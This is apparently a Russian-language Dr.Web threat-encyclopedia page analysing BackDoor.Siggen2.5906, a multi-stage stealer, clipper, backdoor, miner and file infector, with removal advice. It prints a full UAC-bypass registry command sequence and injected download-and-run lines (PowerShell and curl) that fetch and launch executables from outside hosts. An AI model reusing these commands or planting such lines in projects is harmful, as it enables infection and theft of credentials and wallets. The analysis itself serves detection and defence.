Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

BackDoor.Siggen2.5906

Добавлен в вирусную базу Dr.Web: 2026-06-01

Описание добавлено:

SHA1-хеши:

  • 8030c42dc54975c43f7625d874e7890f025dc9f4

Описание

Является третьей стадией трояна, который выполняет сразу несколько функций: стилер, клиппер, бэкдор, майнер и источник заражения файлов:

Эта стадия закрепляется в системе и выполняет основную вредоносную деятельность.

Принцип действия

Подготовка к работе

Троян выполняет проверку запуска в песочнице. Для этого он изучает имя пользователя, оно не должно содержать строку «voke9asd89a8sd8aw8d8awd8a» и не должно называться «Srv». Затем он выполняет проверки, схожие с Trojan.DownLoader49.35687. В названии видеоадаптера, полученное с помощью CreateDXGIFactory() не должно быть следующих имен:

  • unknown,
  • Microsoft Basic Render,
  • NVIDIA GeForce RTX 3060 Ti.

Также имя пользователя должно отличаться от любого из списка:

  • george,
  • Bruno,
  • Abby,
  • AMF,
  • dx,
  • John,
  • elz,
  • Admin.

Если проверка хотя бы по одному показателю проваливается, троян завершает работу. Далее BackDoor.Siggen2.5906 получает по именованному каналу pipe\\VccFramework идентификаторы трояна и домен управляющего сервера, с которым будет коммуницировать третья стадия. Затем троян создает объект синхронизации mutex c именем Global\PFNX_Side {Первая часть pipe\VccFramework}.

Коммуникация с C2 сервером

Расшифровав адрес, троян подключается к домену через url {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=rtttry, откуда получает ключ для последующего шифрования данных при коммуникации с сервером. Если получить ключ этим способом не удается, троян использует сервис dns.google.com/resolve, через который получает IP-адрес C2 домена, преобразовывает его и использует как ключ.

Во время коммуникации с сервером троян шифрует передаваемые данные с помощью операции XOR, используя полученный ранее ключ. К данным также добавляются различные строки и идентификаторы пользователя.

Затем троян подключается к домену через {C2 domain}/api/mnr/bobby31[.]php?type=fudrocketmod&security={Первая часть pipe\VccFramework}. Он получает конфигурацию, в которой содержится информация о дальнейших действиях: нужно ли заразить Win SDK, криптокошелек Exodus и реестр программы WinRAR.

Закрепление в системе

Троян скачивает с url {C2 domain}/Stb/PokerFace/init[.]php?id=Mother файл «bungee.boo» и записывает его в директорию C:\ProgramData\bungee.boo. Этот файл реализует функции стадии 2 (Trojan.DownLoader49.35687). Затем он подменяет на него следующие DLL файлы:

  • «profapi.dll» приложения Discord,
  • «domain_actions.dll» в папке «Domain Actions» и «well_known_domains.dll» в папке «Well Known Domains», а также файлы manifest.json и manifest.fingerprint в обеих папках приложения Microsoft Edge,
  • «C:\Windows\omadmapi.dll».

Дополнительно BackDoor.Siggen2.5906 может модифицировать системный реестр Windows таким образом, что при открытии архивированных файлов с помощью WinRar.exe будет запускаться вредоносный код.

Для действий, требующих прав администратора, троян использует технику обхода UAC. ВПО генерирует .vbs файл с названием из случайных цифр, в котором оставляет команду для выполнения с правами администратора. Далее через cmd.exe запускаются команды:


reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
/c start /B ComputerDefaults.exe 

Сбор информации

Троян собирает:

  • username,
  • CPU,
  • GPU,
  • ram,
  • геолокацию.

Информация отправляется на {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=process вместе со строкой «BrattSalllatSecretPlace62|».

Затем троян реализует 5 вредоносных функций: стилер, клиппер, бэкдор, майнер и источник заражения файлов.

Стилер

Троян крадет различную информацию с зараженного устройства: токены Discord, файлы Telegram, пароли и куки интернет-браузеров, данные криптокошелька Exodus.

  1. Токены Discord.

    В приложениях discord, discordptb, Lightcord, Opera, Opera GX, Brave-Browser, Chrome SxS, Chrome, Chromium, Edge, YandexBrowser троян ищет токены сервиса Discord. Они позволяют войти в аккаунты без обязательного ввода логина и пароля. Зашифрованные токены Discord — это строки, начинающиеся с префикса dQw4w9WgXcQ:. Троян ищет токены внутри содержимого файлов с расширениями .ldb или .log, хранящихся в каталоге LevelDB, расшифровывает их и получает информацию: ID, email, номер телефона, верифицирован ли аккаунт, наличие премиум-подписки. Украденные токены отправляются на {C2 domain}/api/mnr/bobby31[.]php?type=tknlogprcs&security=Daytone с добавленной строкой «MndayFrOppsLX|».

  2. Файлы Telegram.

    Троян ищет на компьютере папку приложения Telegram Desktop\tdata, архивирует файлы и отправляет на {C2 domain}/api/mnr/bobby31[.]php?type=APLATG&security=Daytone.

  3. Пароли и куки.

    Троян отправляет запрос на {C2 domain}/index[.]php?type=pexists&security=2. Ответным сообщением приходит конфигурация, в которой указано, нужно ли копировать пароли и/или куки. Пароли из браузеров Edge, Chrome и Brave расшифровываются, к ним добавляется строка «BabbChnnn64xaxz|» и далее они отправляются на {C2 domain}/api/mnr/bobby31[.]php?type=pssprc&security=Daytone. Куки из веб-браузеров Edge, Chrome, Brave, Mozilla, Opera также расшифровываются и отправляются на сервер.

    Дополнительно троян обладает функциональностью запускать браузеры с параметрами --headless --disable-gpu --no-sandbox --disable-dev-shm-usage--user-data-dir={path} --remote-debugging-port=0' в скрытом окне.

    Также троян скачивает файл CCCWF.tmp (Trojan.PWS.Siggen5.33623) в %TEMP% с {C2 domain}/Stb/PokerFace/init[.]php?id=Ppkvum. Данный файл внедряется в браузеры, затем он расшифровывает пароли и записывает их в файл с названием brx. В свою очередь, ключи шифрования сохраняются в файл crx. В файл dll_debug.txt записываются логи исполнения трояна.

    #drweb

    Похищенные куки и файл brx с расшифрованными паролями троян отправляет на {C2 domain}/api/mnr/bobby31[.]php?type=ckiprc&security=Daytone с добавлением строки «WalterXPrxxxzCokerPro37&|-|&».

  4. Данные Exodus

    Троян ищет на зараженном устройстве папку криптокошелька Exodus. В случае обнаружения он архивирует ее и отправляет на {C2 domain}/api/mnr/bobby31[.]php?type=APLADEX&security=Daytone/.

    Кроме хищений папок Exodus, троян производит модификацию криптокошелька. Для этого он находит файл app.asar и заменяет его на копию, скачанную с URL balista[.]lol/Stb/PokerFace/RTApp[.]txt при помощи curl. В подмененной версии в index.js (Trojan.Siggen32.44702) находится функция unlock(), которая при запуске отправляет мнемонические фразы кошелька на сервер злоумышленников.

    #drweb

Клиппер
  1. Банковские карты

    Используя регулярные выражения, троян постоянно следит за буфером обмена. Если ВПО обнаруживает в нем данные банковских карт, то отправляет их на {C2 domain}/api/mnr/bobby31[.]php?type=cclogentry&security=Daytone с добавлением строки «AtummmSalllllxXX1522|».

  2. Криптовалюта

    Троян отправляет запрос на {C2 domain}/api/mnr/bobby31[.]php?type=cryptosecr&security=Daytone со строкой «VooZXOOPPPS883321|». В ответ он получает адреса криптокошельков злоумышленников, которые троян будет использовать для подмены других адресов, найденных в буфере обмена.

Бэкдор

Троян получает новый ключ шифрования с {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=rtttry. Далее он обращается к {C2 domain}/api/mnr/bobby31[.]php?type=pingcnfr&security=Daytone, откуда получает конфигурацию с перечислением действий для выполнения. Доступные команды для удаленного управления:

exc скачать файл с url при помощи curl и запустить его
RVRS запустить Reverse Proxy
RUNCMD запустить команду через cmd
GETFILE загрузить содержимое определенного файла на управляющий сервер
LISTDIR отправить список файлов из определенной директории компьютера на управляющий сервер
TROLL запустить команду для троллинга пользователя, есть опции earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer и т. д.
Майнер

При помощи curl троян скачивает с сервера и запускает файл https://files[.]catbox[.]moe/lvh9j3[.]bin. Этот файл представляет собой загрузчик, который запускает скрытый майнер Trojan.BtcMine.3956.

Заражение файлов

Троян обращается к {C2 domain}/api/mnr/bobby31[.]php?type=stbcfg&security=Daytone&owr={Первая часть pipe\VccFramework} и получает конфигурацию с предписанием, какие файлы заражать. Возможные варианты:

  • imgui_impl_win32.cpp,
  • .suo,
  • .exe,
  • winnetwk.h (Windows SDK),
  • .vcxproj и .csproj.

Чтобы определить пути к файлам, которые можно заразить, троян перебирает диски и запускает команду. Пример для диска A://


dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290
  1. imgui_impl_win32.cpp. Trojan.Loader.3129

    Объект для заражения — часть популярной библиотеки Dear ImGui. Она предназначена для создания графических интерфейсов для С++. Троян внедряет в файл две строки: в первой содержится пэйлоад, вторая запускает его.

    #drweb

    #drweb

    В итоге создается команда

    
    start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 
    

    Теперь созданные с помощью зараженного файла imgui_impl_win32.cpp приложения будут нести в себе вредоносный код и распространять заражение на другие компьютеры.

  2. .suo. Trojan.Loader.3138

    Это расширение файлов среды разработки Microsoft Visual Studio. В них хранятся настройки пользователя для определенных проектов. Троян заменяет оригинальный файл на зараженный, полученный с C2.

    #drweb

    При открытии проекта в Visual Studio запускается вредоносный код:

    
    javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\"
    \"https://pee-files.nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\"
    \"C:\\ProgramData\\S47LY.exe\"', 0, false);close(); 
    
  3. winnetwk.h. Trojan.Loader.3184

    Windows SDK — официальный набор инструментов Misrosoft, который позволяет создавать приложения для ОС Windows.

    Троян ищет в реестре SOFTWARE\Microsoft\Windows Kits\Installed Roots значение KitsRoot10. Определив папку, в которую установлен Windows SDK, троян ищет в ней файл winnetwk.h, ответственный за работу с сетевыми ресурсами. Затем в него добавляется вредоносный код.

    #drweb

    После этого все программы, созданные с помощью winnetwk.h, будут иметь вредоносный код.

  4. .exe

    Троян ищет подходящие .exe файлы и внедряет в них функции инициализации API и запуска initterm. Затем файл начинает работать как Trojan.DownLoader49.35384, он же стадия 1.

  5. .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) и .csproj (Trojan.Loader.3126)

    Это файлы проектов Visual Studio на языках программирования C++ и C#. В них добавляется команда PreBuildEvent, которая запускается перед каждой сборкой проекта. В ранних версиях добавлялся код

    #drweb

    Сейчас код стал сложнее, в нем появилась дополнительная обфускация

    #drweb

    #drweb

    В результате вредоносной команды записывается вредоносный .vbs файл, который, в свою очередь, запускает PowerShell payload. Троян делает запрос к URL-адресам:

    • youtu[.]be/akoxddx6lgc,
    • steamcommunity[.]com/profiles/76561198737324192.

    На этих адресах хранится другой URL-адрес, зашифрованный с помощью base64. После расшифровки троян получает C2 домен, к которому обращается за нагрузкой, сходной с Trojan.DownLoader49.35687.

Матрица MITRE

Этап Тактика
Выполнение

Интерпретаторы командной строки и сценариев (T1059)

Выполнение с участием пользователя (T1204)

Закрепление

Автозапуск при загрузке или входе в систему (T1547)

Компрометация бинарных файлов ПО узла (T1554)

Повышение привилегий

Внедрение кода в процессы (T1055)

Обход контроля учетных записей (T1548.002)

Предотвращение обнаружения

Обфусцированные файлы или данные (T1027)

Маскировка (T1036)

Обход виртуализации или песочницы (T1497)

Обход контроля учетных записей (T1548.002)

Внедрение кода в процессы (T1055)

Получение учетных данных

Кража сессионных куки (T1539)

Учетные данные из браузеров (T1555.003)

Обнаружение

Запросы к реестру (T1012)

Изучение владельца или пользователей системы (T1033)

Изучение системы (T1082)

Изучение файлов и каталогов (T1083)

Обход виртуализации или песочницы (T1497)

Изучение установленного ПО (T1518)

Изучение местоположения системы (T1614)

Сбор данных

Промежуточное хранение данных (T1074)

Данные из буфера обмена (T1115)

Архивация собранных данных (T1560)

Организация управления

Протокол прикладного уровня (T1071)

Веб-служба (T1102)

Передача инструментов из внешней сети (T1105)

Зашифрованный канал (T1573)

Эксфильтрация данных Эксфильтрация по каналу управления (T1041)

Подробнее об Trojan.DownLoader49.35384

Подробнее об Trojan.DownLoader49.35687

Подробнее об Trojan.BtcMine.3956

Индикаторы компрометации

Новость о трояне

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке